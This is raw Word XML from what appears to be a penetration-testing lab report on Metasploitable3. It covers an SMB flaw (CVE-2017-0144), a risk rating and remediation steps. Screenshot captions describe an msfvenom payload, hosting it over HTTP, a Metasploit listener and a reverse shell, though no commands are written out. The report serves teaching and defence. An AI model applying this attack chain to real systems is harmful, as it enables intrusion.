          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Outdated SMB service on Metasploitable3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1483AA8A" w14:textId="77777777" w:rsidR="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE Reference: CVE-2017-0144.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2511A" w14:textId="1EE36418" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVSS Score: 9.3 (Critical).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E13A2" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="0032559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25596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerability 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00325596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Default credentials and lack of endpoint security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132F3F4" w14:textId="77777777" w:rsidR="00A45F4C" w:rsidRDefault="00A45F4C" w:rsidP="00D3314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22850B7" w14:textId="77777777" w:rsidR="00A45F4C" w:rsidRDefault="00A45F4C" w:rsidP="00D3314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00184D4" w14:textId="63C885BF" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusions &amp; Risk Rating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5551788E" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerabilities Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318ABAA0" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Exploitable SMB vulnerability allowing remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32266810" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Lack of user awareness leading to successful phishing payload execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067302C9" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Overall Risk Rating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83F71A" w14:textId="5076F8D5" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The overall risk for the system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, given the critical vulnerabilities and ease of exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB7CAF" w14:textId="718B659C" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Remediation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB100D" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Update and Patch Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0803B1B2" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Apply security updates to the SMB service and other outdated software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4AD98" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Implement Endpoint Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64444EF9" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Deploy antivirus and anti-malware solutions to detect payloads like payload.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B968D7C" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Enhance User Awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE9E85" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Conduct training on recognizing phishing attempts and verifying links before execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D4314E" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Use Least Privilege Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577440C5" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Disable unnecessary services and enforce strong credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E5B1B1" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE8AE7" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Isolate vulnerable systems from critical network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171E3D5" w14:textId="1CE89D8C" w:rsidR="00573365" w:rsidRDefault="006D6C1F" w:rsidP="006D6C1F">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Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4843618B" w14:textId="54D4C414" w:rsidR="00A4563E" w:rsidRPr="00FA24A9" w:rsidRDefault="00A4563E" w:rsidP="00A4563E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:num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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirming </w:t>
      </w:r>
      <w:r w:rsidR="00FA24A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ability to communicate between both Kali Linux and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA24A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA24A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE0349" w14:textId="4C4E494F" w:rsidR="00FA24A9" w:rsidRDefault="00FA24A9" w:rsidP="00FA24A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="cente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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1585897C" wp14:editId="680935D5">
            <wp:extent cx="5943600" cy="3818890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197371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13122"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18890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725F3F80" wp14:editId="28F7A13B">
            <wp:extent cx="5943600" cy="3426460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="118893731" name="Picture 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3731" name="Picture 2" descr="A computer screen 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14:paraId="00473A91" w14:textId="77777777" w:rsidR="006F3C0E" w:rsidRDefault="006F3C0E" w:rsidP="00FA24A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CB7D71" w14:textId="2F90A49E" w:rsidR="006F3C0E" w:rsidRDefault="000E6129" w:rsidP="006F3C0E">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Payload creation with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21C9EB67" w14:textId="1416B65A" w:rsidR="005336D3" w:rsidRDefault="005336D3" w:rsidP="005336D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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465E6194" wp14:editId="379046FA">
            <wp:extent cx="5943600" cy="4859655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="827355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55432" name="Picture 827355432"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4859655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C303E" w14:textId="77777777" w:rsidR="0052728D" w:rsidRDefault="0052728D" w:rsidP="005336D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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14:paraId="5E79E0A3" w14:textId="424388F9" w:rsidR="0052728D" w:rsidRPr="0052728D" w:rsidRDefault="0052728D" w:rsidP="0052728D">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728D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hosting Payload on Python HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00D383" w14:textId="01505DEC" w:rsidR="0052728D" w:rsidRDefault="00CA229C" w:rsidP="0052728D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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032FD917" wp14:editId="244E496C">
            <wp:extent cx="5943600" cy="4817745"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="10298218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1855"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817745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BEDA4" w14:textId="77777777" w:rsidR="00CA229C" w:rsidRDefault="00CA229C" w:rsidP="0052728D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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14:paraId="61AB357D" w14:textId="18167D5E" w:rsidR="00CA229C" w:rsidRDefault="00A67E62" w:rsidP="00A67E62">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67E62">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Configuring Metasploit Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAB378" w14:textId="0C1CDC61" w:rsidR="00A67E62" w:rsidRDefault="00A67E62" w:rsidP="00A67E62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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4A3F27F7" wp14:editId="3135F36D">
            <wp:extent cx="5943600" cy="5481320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="55613146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31464"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481320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F09F1A3" w14:textId="77777777" w:rsidR="00A67E62" w:rsidRDefault="00A67E62" w:rsidP="00A67E62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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14:paraId="71751612" w14:textId="50D13BB6" w:rsidR="00A67E62" w:rsidRDefault="00B9260C" w:rsidP="00A67E62">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9260C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Payload Delivery and Reverse Shell Establishment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC7E397" w14:textId="46C30E25" w:rsidR="00B9260C" w:rsidRPr="00B9260C" w:rsidRDefault="00A45F4C" w:rsidP="00B9260C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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2120186B" wp14:editId="682F83EE">
            <wp:extent cx="5943600" cy="4673600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184598023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80235"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673600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0493206A" wp14:editId="6C7BDC3F">
            <wp:extent cx="5943600" cy="3154680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2072615121" name="Picture 7" descr="A computer screen shot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15121" name="Picture 7" descr="A computer screen shot of a softwar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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="440275F6" wp14:editId="252071D4">
            <wp:extent cx="5943600" cy="4486910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="163858278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82781" name="Picture 8"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486910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1261E8C8" w14:textId="77777777" w:rsidR="006D6C1F" w:rsidRPr="006D6C1F" w:rsidRDefault="006D6C1F" w:rsidP="006D6C1F">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6B4C7337" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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1FE9B17" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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28BB050" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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1A7F3D6" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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A87B33C" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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31DC8F5" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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79C9895" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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025B226" w14:textId="77777777" w:rsidR="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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A61D27E" w14:textId="77777777" w:rsidR="00A45F4C" w:rsidRDefault="00A45F4C" w:rsidP="00D3314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8E5A038" w14:textId="4BFFAB77" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C404C5A" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BDE187" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5481C0CC" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. (n.d.). </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Metasploit Framework Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00D33140">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://www.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10CE3A43" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive Security. (n.d.). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
